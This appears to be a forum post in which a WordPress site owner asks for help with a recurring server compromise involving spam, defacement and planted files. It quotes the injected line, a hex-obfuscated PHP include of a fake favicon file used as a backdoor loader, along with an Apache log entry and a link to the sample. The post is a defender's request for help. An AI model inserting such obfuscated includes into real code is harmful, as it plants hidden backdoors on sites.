I have wordpress website (latest version, also updated all plugins to latest version) running on Azure Centos 7 LAMP Server. Recently, I noticed that my server sending spam emails. When I checked this in detail, I found some malicious file was created on server. Also there were some posts with the title as "Hacked by xxxxx".
Then I have stopped postfix server and routed contact form emails through sendgrid. Also scanned wordpress files using some antivirus plugins, deleted suspicious post and confirmed that there are no malicious files. But after one or two days, again same issue happening, injecting some malicious code to index.php, wp-config.php.
Here is the code which injected to index.php, wp-config.php, wp-settings.php :
/42be3/
@include "\x2fva\x72/w\x77w/\x68tm\x6c/d\x61fa\x74er\x2fbl\x6fg/\x77p-\x63on\x74en\x74/u\x70lo\x61ds\x2ffa\x76ic\x6fn_\x6668\x39cd\x2eic\x6f";
/42be3/
Also found the permissions were changing to 755 from 644 for wp-config.php and index.php
My Current permissions are :
folder : 755
files : 644
Here is the log from apache :
184.168.193.119 - - [15/Mar/2017:17:46:33 +0000] "POST /wp-content/themes/Avada/bbpress/title.php HTTP/1.0" 301 -
if we delete the file mentioned on log, there will be no issues. But after one or two days, they will create another file with random name in any of other folders.
I have added malicious file code to my dropbox account.
Here is the link :
https://www.dropbox.com/s/yql04vr6ltiy9oz/samplecode.txt?dl=0
What I have done to prevent this :
Unfortunately, still new malicious files creating on server and generating emails.
It would be great if anyone can help me on this.
Thanks in advance